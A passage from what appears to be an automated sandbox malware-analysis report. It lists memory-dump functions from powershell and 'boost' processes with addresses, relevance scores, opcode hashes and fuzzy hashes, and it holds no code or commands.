                                                                            • Opcode Fuzzy Hash: 7a81d4bf31db40ef8f52bb6b9b270bdc04299948dca31dc526b7e63fdd457287
                                                                            • Instruction Fuzzy Hash: BE31DE7191CF488FEB589B5CA84A6A97BE1FBA5311F00812FE04DD3252DA70A855CBC2
                                                                            Function 00007FFAAC49ED40 Relevance: .1, Instructions: 122COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1666150094.00007FFAAC49D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC49D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac49d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8bab5b6660bfbcc82c0b47fb41836bb51082e44583b955d33d6fa4c413ae76fa
                                                                            • Instruction ID: 20f805e2156d74bd1d47d7373b8b0da4cefd406932f720b216cbefc6f67b4412
                                                                            • Opcode Fuzzy Hash: 8bab5b6660bfbcc82c0b47fb41836bb51082e44583b955d33d6fa4c413ae76fa
                                                                            • Instruction Fuzzy Hash: 8041F57140EBC48FE756DB289845A523FF0EF57224B1946DFD088CB1A3D629E84AC792
                                                                            Function 00007FFAAC5BA47C Relevance: .1, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1668950680.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac5b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4657c4ea70204a7dde75611ded36aabd815b63953eca9bc1b30762ba68c0570d
                                                                            • Instruction ID: 1ef41aa47ede30a765c032f070fe4395278b24769e374f495a95ed942ee44d4f
                                                                            • Opcode Fuzzy Hash: 4657c4ea70204a7dde75611ded36aabd815b63953eca9bc1b30762ba68c0570d
                                                                            • Instruction Fuzzy Hash: EC21283090C74C8FEB19DB6C984A7E97FE0EB56320F04426BD049C3162DA74A44ACB91
                                                                            Function 00007FFAAC6840BF Relevance: .1, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1676944775.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac680000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1c5facc79e1e2a3a83e1593983b22567b3f005d883d253c416959ddecad6dfe6
                                                                            • Instruction ID: 63591f4e6bfd9548f992751e7c2043dd8ba4f3fbb61d3c07135d07d3e6038e74
                                                                            • Opcode Fuzzy Hash: 1c5facc79e1e2a3a83e1593983b22567b3f005d883d253c416959ddecad6dfe6
                                                                            • Instruction Fuzzy Hash: 9121062290EA878FF7A6CB3C44615756AC2EF62214B49A0B9C18EC71A2CF18DD099381
                                                                            Function 00007FFAAC6843BC Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1676944775.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac680000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d45404973a27b871c4db78ea9f86f7a5f5d8dd36d24b886f03e22eef59c2ac0a
                                                                            • Instruction ID: c694c0883d3055852fd10f3b15c6d828af4271a1d6b069e6f5c3799b34b319ad
                                                                            • Opcode Fuzzy Hash: d45404973a27b871c4db78ea9f86f7a5f5d8dd36d24b886f03e22eef59c2ac0a
                                                                            • Instruction Fuzzy Hash: 2011A33290F6858FF7A6DB7894A49B87BD1EF02210B4964FAD65DC7493DF18ED088381
                                                                            Function 00007FFAAC5B33B5 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1668950680.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac5b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                            • Instruction ID: 9734953e55ba6020dfa6fd68283ddc5c6f3e0e898dd62d03ef2e06dc28d86645
                                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                            • Instruction Fuzzy Hash: CB01A77010CB0C8FD744EF0CE051AA6B7E0FB89320F10052DE58AC3661DA32E882CB41

                                                                            Non-executed Functions

                                                                            Function 00007FFAAC5B8345 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1668950680.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac5b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: K_^$K_^$K_^$K_^
                                                                            • API String ID: 0-4267328068
                                                                            • Opcode ID: f5874f1f825d5651814a15e92f5ad4d60e5ad0dbc9cef1bc5a8513020bc6c840
                                                                            • Instruction ID: e26594ed18527427c026b6425f31a9e8a183643b3cf6c24931d06aa0ce994c93
                                                                            • Opcode Fuzzy Hash: f5874f1f825d5651814a15e92f5ad4d60e5ad0dbc9cef1bc5a8513020bc6c840
                                                                            • Instruction Fuzzy Hash: 61C19FA7D5E3C38FE317873C58690D67FA0EE1322871942EBD0D58E093EA14548AD7E6
                                                                            Function 00007FFAAC5B8995 Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1668950680.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac5b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: K_^$K_^$K_^$K_^
                                                                            • API String ID: 0-3666970850
                                                                            • Opcode ID: afb770274ed092b2536a1487612e8d27bc5f3e279fa3d9872dcf1cd6b05b0f13
                                                                            • Instruction ID: fbcb0d850c2c75942c756cf073aabcdbe1199fe1b3fbd801552622ab1ccca050
                                                                            • Opcode Fuzzy Hash: afb770274ed092b2536a1487612e8d27bc5f3e279fa3d9872dcf1cd6b05b0f13
                                                                            • Instruction Fuzzy Hash: 48418352D5E3C28FE757872C58680D57FA0EF57228B0D82F7D0948B0D3EA18984AD3E6

                                                                            Executed Functions

                                                                            Function 00007FFAAC666605 Relevance: .4, Instructions: 440COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1941943336.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac660000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5341b89cf77e63d7005b36d6623040807168e9eca96c5d51d00462952d1dbbe9
                                                                            • Instruction ID: b25ae7a9f756430adaed10d3b2e87c9b954f792bd8efecee99db67de4bddf835
                                                                            • Opcode Fuzzy Hash: 5341b89cf77e63d7005b36d6623040807168e9eca96c5d51d00462952d1dbbe9
                                                                            • Instruction Fuzzy Hash: 49D1566190EB8A8FF75AE738A8155B5BFA0EF46310B0851BED44DC71D3DD28D80983D1
                                                                            Function 00007FFAAC599885 Relevance: .2, Instructions: 198COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1940541666.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac590000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 69ec1659b70513f331842407f7fa327074cb9f0bccf049c7860ae5f988789f09
                                                                            • Instruction ID: dc7cb9f5f25247f65f9cf8b3e847d5d856d15e2830ce30193772343bcc911cea
                                                                            • Opcode Fuzzy Hash: 69ec1659b70513f331842407f7fa327074cb9f0bccf049c7860ae5f988789f09
                                                                            • Instruction Fuzzy Hash: A551B93191CB498FDB1C9F5C98466A8BBE0FB99721F00426FE04D93651CB75B456CBC2
                                                                            Function 00007FFAAC664073 Relevance: .2, Instructions: 186COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1941943336.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac660000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 630e3a47565b7d7024f95f79bcaf4be672862f439e78300f605d7e5ba630521c
                                                                            • Instruction ID: f21ca90410cf59f10fbb0bd0da1a8d783ab520b7e481ea1ae3391601d91d3149
                                                                            • Opcode Fuzzy Hash: 630e3a47565b7d7024f95f79bcaf4be672862f439e78300f605d7e5ba630521c
                                                                            • Instruction Fuzzy Hash: FF51E822A0DA868FF79ED71C9451674F7D1EF96321B19A0BAC14EC7193EE14EC0983C5
                                                                            Function 00007FFAAC599770 Relevance: .1, Instructions: 143COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1940541666.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac590000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c0e82ef28913307f4c19a27de68003e69001149bb4b03be653c7897768fe6de8
                                                                            • Instruction ID: 5eb10704390ebf591e7d062d278b8b9b3b8b1e92dab75f979016fc70a2c57315
                                                                            • Opcode Fuzzy Hash: c0e82ef28913307f4c19a27de68003e69001149bb4b03be653c7897768fe6de8
                                                                            • Instruction Fuzzy Hash: 0A41097190DB888FE7189F5CA84A6B97FE4FB56310F04416FE04DC3292CE25A815CBC2
                                                                            Function 00007FFAAC47EB80 Relevance: .1, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1939182290.00007FFAAC47D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC47D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac47d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b1e6df48d4aebab2aa4947a026e1bf1d3e8a0f0bc2325835c43cec7be70bc0ff
                                                                            • Instruction ID: f3a2b53bf0aa371747f739fb1ef7dc5c330c1725d5169322678b8303a51eed70
                                                                            • Opcode Fuzzy Hash: b1e6df48d4aebab2aa4947a026e1bf1d3e8a0f0bc2325835c43cec7be70bc0ff
                                                                            • Instruction Fuzzy Hash: 1C41057140EBC48FE756CB2998459623FB0EF53324B1506EFD089CB1A3D625E84AC792
                                                                            Function 00007FFAAC59A49C Relevance: .1, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1940541666.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac590000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8e26b74bfaba1cfdb5fcd3535ffcb27f9d8fa6dfb6e6e911a1d3836a90ae097e
                                                                            • Instruction ID: e65510941f33a533ef340678191515ec0db3afdfff28c35fcdc9bd16578cc451
                                                                            • Opcode Fuzzy Hash: 8e26b74bfaba1cfdb5fcd3535ffcb27f9d8fa6dfb6e6e911a1d3836a90ae097e
                                                                            • Instruction Fuzzy Hash: A221E93190C74C8FEB59DBAC984A7E97FE0EB96321F04816BD04DC3152DA75A419C792
                                                                            Function 00007FFAAC59A0FB Relevance: .1, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1940541666.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac590000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 68260b981374b7e61c28ce9f7c7f3ace4820091b8de4a938562f9edd47f54ba2
                                                                            • Instruction ID: 27d0ce9ad756a26e62f0539c0b81a0782c0c7b8b4a3118fd4649be2b0a14b3c5
                                                                            • Opcode Fuzzy Hash: 68260b981374b7e61c28ce9f7c7f3ace4820091b8de4a938562f9edd47f54ba2
                                                                            • Instruction Fuzzy Hash: 5911C66798EA8B8BF7919B1C98560E43BA4EF53214B0882F3E04C97093DD1AD80D82E1
                                                                            Function 00007FFAAC5933B5 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1940541666.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac590000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                            • Instruction ID: 87eadb6654d61433683f2c66da77b1f1539f0b58070b408ac67488b96e791635
                                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                            • Instruction Fuzzy Hash: 5301677115CB0D8FD744EF0CE451AA5B7E0FB99364F10056DE58AC3661DA36E882CB45
                                                                            Function 00007FFAAC664400 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1941943336.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac660000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: de73da3785e057e6e68bcf7cadae2c8699a18263fb1f781cfd44b041987fbd00
                                                                            • Instruction ID: 6de636e7dc1a0b3535e7d5ae9b6e1e049c72f32d61963f1a961d5782ff56637e
                                                                            • Opcode Fuzzy Hash: de73da3785e057e6e68bcf7cadae2c8699a18263fb1f781cfd44b041987fbd00
                                                                            • Instruction Fuzzy Hash: 97F0BE32A0D5448FE75AEB1CE0428A8B7E0EF06320B0150B6E04EC7463DE26EC44C780
                                                                            Function 00007FFAAC664151 Relevance: .0, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1941943336.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac660000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ba98893f7128143df14ad1810441791ecbd0664426f48b3ea54c8088d3ec9065
                                                                            • Instruction ID: c942036991a7f48ddaae9f9db7f1f69e683e6e60c4653fce841e872807cfdde3
                                                                            • Opcode Fuzzy Hash: ba98893f7128143df14ad1810441791ecbd0664426f48b3ea54c8088d3ec9065
                                                                            • Instruction Fuzzy Hash: 33F08C32A0D5458FE76ADB1CE4408F8B7E0EF5636070560BAE15DC71A2EA25EC46CB80

                                                                            Non-executed Functions

                                                                            Function 00007FFAAC598BFA Relevance: 6.3, Strings: 5, Instructions: 91COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.1940541666.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_7ffaac590000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M_^5$M_^8$M_^F$M_^I$M_^K
                                                                            • API String ID: 0-2170160206
                                                                            • Opcode ID: 74b63124fd5fea35c7cd052b3b0a08978ada7e42a90d4f0c3ce84e54da50b638
                                                                            • Instruction ID: 53471a2640fec7c06fa4d70b4698bf4fa29dcbb1e8fa7553977c863a824dfc69
                                                                            • Opcode Fuzzy Hash: 74b63124fd5fea35c7cd052b3b0a08978ada7e42a90d4f0c3ce84e54da50b638
                                                                            • Instruction Fuzzy Hash: D02125B7718166CAD2013B7DAC259DC7784CF9827538987F2E199CF293EC18608A8980

                                                                            Executed Functions

                                                                            Function 00007FFAAC5A12B9 Relevance: .8, Instructions: 805COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2017451899.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_7ffaac5a0000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dce58bc73483f0acd831f35275ea3df0bf187c2931041cbb648afb995d5088d0
                                                                            • Instruction ID: 39a56116ed9e9731cbdddecaa9902b2253b589d1a758b739bda7a4ef3410f77d
                                                                            • Opcode Fuzzy Hash: dce58bc73483f0acd831f35275ea3df0bf187c2931041cbb648afb995d5088d0
                                                                            • Instruction Fuzzy Hash: 9E42E861B6CA0A8FF794F73CC4596B977D6FF99700F508579E04EC3292DE28A8058781
                                                                            Function 00007FFAAC5A1C4D Relevance: .2, Instructions: 193COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2017451899.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_7ffaac5a0000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d378dd7c564af50e44f5087af5b63a8ae428f81b44646a36a315fb52313310ee
                                                                            • Instruction ID: e7bf455ecc3ebd7dc92f4835d0e075b18a93c7e0771772d20282253b581b67f5
                                                                            • Opcode Fuzzy Hash: d378dd7c564af50e44f5087af5b63a8ae428f81b44646a36a315fb52313310ee
                                                                            • Instruction Fuzzy Hash: 48513551A5E6CA8FE786A73898786767FD8EF57215B0804FBE0CDC7193DD084806C382
                                                                            Function 00007FFAAC5A0C2E Relevance: .8, Instructions: 773COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2017451899.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_7ffaac5a0000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c001db31b47fc13309de00046071136855f3cfa6e54a6f39cc52ac14463d2430
                                                                            • Instruction ID: d9a268a67ce6622ed8a881eb7501f308a4481c626e7f38263ddeee6098d213de
                                                                            • Opcode Fuzzy Hash: c001db31b47fc13309de00046071136855f3cfa6e54a6f39cc52ac14463d2430
                                                                            • Instruction Fuzzy Hash: F0914922A1D68A8FE745A73CD86A5F97BE1EF87310B0841F7D04EC7193DD18AC4A8391
                                                                            Function 00007FFAAC5A082D Relevance: .2, Instructions: 162COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2017451899.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_7ffaac5a0000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4b947071785d2a8f951389ecc920ed7d474f8c33d47165441f01fb843ef7f914
                                                                            • Instruction ID: 5d4b6e90a0af7ffe4a163fee482e08c11edf3d30a9d5a22360f70f3493bf18a9
                                                                            • Opcode Fuzzy Hash: 4b947071785d2a8f951389ecc920ed7d474f8c33d47165441f01fb843ef7f914
                                                                            • Instruction Fuzzy Hash: 4251476195D68BCFE345B73C88A84E97FE0EF82714B54C1B5D04AC76A7DD28580A83C5
                                                                            Function 00007FFAAC5A04D8 Relevance: .1, Instructions: 137COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2017451899.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_7ffaac5a0000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a633809c3f2ac54d1ac9c4c7b7a8e468d1f685ce664683966dc794a918aa8833
                                                                            • Instruction ID: 9a09478ae7ff7e7fcc4e233cf942dfdf938374550cffeea6d4c91c30aa6f525e
                                                                            • Opcode Fuzzy Hash: a633809c3f2ac54d1ac9c4c7b7a8e468d1f685ce664683966dc794a918aa8833
                                                                            • Instruction Fuzzy Hash: 0031D362B1C9494FEB88FB3CD46A679B6C6EF99311F1445BAF04EC3293DD649C428381
                                                                            Function 00007FFAAC5A0AC9 Relevance: .1, Instructions: 124COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2017451899.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_7ffaac5a0000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 37753eadb13b503bf344b9f30fc3b1954cb8b9035b0ddc1d57f34968945a151c
                                                                            • Instruction ID: 3ab2356cee905b953390a6550ba4fb840b51edb3c2a97b83d19dc2414f311477
                                                                            • Opcode Fuzzy Hash: 37753eadb13b503bf344b9f30fc3b1954cb8b9035b0ddc1d57f34968945a151c
                                                                            • Instruction Fuzzy Hash: E531C352B1DA0A8FF744BBBC98197BD77D5EFD9711F0482BAE00EC3292DD2898018391
                                                                            Function 00007FFAAC5A0985 Relevance: .1, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2017451899.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_7ffaac5a0000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5dcc968ba1cfd151bcf6dc81ad76db0cd1e69b70df76e7bcdc21c8e66e2191d7
                                                                            • Instruction ID: 65b557268bd0a4ec9d96562961a4e94608a5a65480c1debdeb68161aa2053ba2
                                                                            • Opcode Fuzzy Hash: 5dcc968ba1cfd151bcf6dc81ad76db0cd1e69b70df76e7bcdc21c8e66e2191d7
                                                                            • Instruction Fuzzy Hash: B631A471A5860E8FEB44FB78C8696EDB7E1FF88300F548575D00ED7296CE38A8458781
                                                                            Function 00007FFAAC5A07F0 Relevance: .1, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2017451899.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_7ffaac5a0000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c37e9054861b74f82eb6b1eb7b61ca7d033c92efd19c1dc2469d3032cca8d430
                                                                            • Instruction ID: d94a6ea70e92d630094a00d992703b6165f22825f37fb12534f9f4f216d84bff
                                                                            • Opcode Fuzzy Hash: c37e9054861b74f82eb6b1eb7b61ca7d033c92efd19c1dc2469d3032cca8d430
                                                                            • Instruction Fuzzy Hash: F331D460A9D50E8FD780F72CC4698EA7BE1FF88305B90C071E10EC7B9ADE285846C785
                                                                            Function 00007FFAAC5A0848 Relevance: .1, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2017451899.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_7ffaac5a0000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b5372f47c70aef0d007f4eb9126136ed614bc978100b775b92ebb5313af36ea5
                                                                            • Instruction ID: 871f7d2af00064b6143fa13f14063dcc2506efe85e0fa87fe984286ca7d85ee3
                                                                            • Opcode Fuzzy Hash: b5372f47c70aef0d007f4eb9126136ed614bc978100b775b92ebb5313af36ea5
                                                                            • Instruction Fuzzy Hash: 2921C86059850D8FD780FB3CC4588AA7BF1FF84304B91C4B5D04AC7B9ADE245845C785
                                                                            Function 00007FFAAC5A1E01 Relevance: .0, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2017451899.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_7ffaac5a0000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9103c590bf7c22776bebd53c98350739d1a16285c3f383cbac82392accb3677f
                                                                            • Instruction ID: 0ec9a709ba4ed46802136b39bde9bccff36451b06fd639b803b6ae89f9c9af6d
                                                                            • Opcode Fuzzy Hash: 9103c590bf7c22776bebd53c98350739d1a16285c3f383cbac82392accb3677f
                                                                            • Instruction Fuzzy Hash: 2F014711C0D7C68FE781633858690767FE0CF92620B0845ABE4CDCA1D7D808998A83C2

                                                                            Non-executed Functions

                                                                            Function 00007FFAAC5A06FA Relevance: 6.3, Strings: 5, Instructions: 7COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2017451899.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_7ffaac5a0000_boost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: =M_^$M_^ $M_^"$M_^$$M_^&
                                                                            • API String ID: 0-308471919
                                                                            • Opcode ID: d19887c059d49d2bcd7615bb6710fd589a1fa9e9c9451eceb59be9b7376c33b5
                                                                            • Instruction ID: b7f7d992f04730d694c04bc79e5810c65e81931268f120922a6e253779284112
                                                                            • Opcode Fuzzy Hash: d19887c059d49d2bcd7615bb6710fd589a1fa9e9c9451eceb59be9b7376c33b5
                                                                            • Instruction Fuzzy Hash: CDB012A284C1E393D763227464E80E47FC06F0D66873C8EA2C1E9C9103EC0840056209
                                                                            Function 00007FFAAC5A0688 Relevance: 5.1, Strings: 4, Instructions: 132COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2017451899.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
